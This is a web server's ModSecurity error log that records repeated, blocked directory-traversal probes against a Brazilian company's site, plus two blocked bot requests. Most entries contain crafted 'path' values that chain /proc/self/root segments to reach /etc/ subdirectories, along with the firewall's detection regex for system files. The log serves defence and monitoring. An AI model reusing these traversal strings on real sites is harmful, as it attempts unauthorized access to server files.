[Wed Mar 18 12:08:15.362915 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:36948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_39Y0UrI5A3LftIy-LgAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:16.662539 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:36952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_4EzinOy1jxa1j4ckIgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:17.971012 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:36964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_4eoXxyEfFpUF8f97WAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:21.512185 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:36972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_5ew_le52K8_3pV3tEAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:22.832204 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:59258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_5uoXxyEfFpUF8f97XgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:25.511844 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:59274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_6SmAPhZkrhU8w4l7VAAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:27.879384 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:59290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_69Y0UrI5A3LftIy-PAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:29.139099 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:59298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_7da6ubjKNq_cu4aqJQAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:30.609674 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:49240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_7uyqAr6etmhZHNrRyAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:33.025194 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:49244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_8UzinOy1jxa1j4ckLQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:34.292093 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:49254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_8uyqAr6etmhZHNrR0QAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:35.643223 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:49268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_8-w_le52K8_3pV3tGQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:39.137985 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:49276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_98df6f5d65gmYZTiuAAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:42.622980 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:39576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_-imAPhZkrhU8w4l7XAAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:45.031918 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:39582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq__Mdf6f5d65gmYZTiwAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:47.376873 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.243.128:39586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq__uw_le52K8_3pV3tHAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:53.197789 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.228.61:47004] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrABeyqAr6etmhZHNrR6QAAAE8"]
[Wed Mar 18 12:08:54.286816 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.244.43:40524] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrABsdf6f5d65gmYZTi0AAAAso"]
[Wed Mar 18 12:08:56.189402 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:39598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrACMdf6f5d65gmYZTi0gAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:59.915830 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:35986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrACkzinOy1jxa1j4ckPAAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:01.771187 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:41334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrADeyqAr6etmhZHNrR9QAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:03.168323 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:41348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAD8df6f5d65gmYZTi1gAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
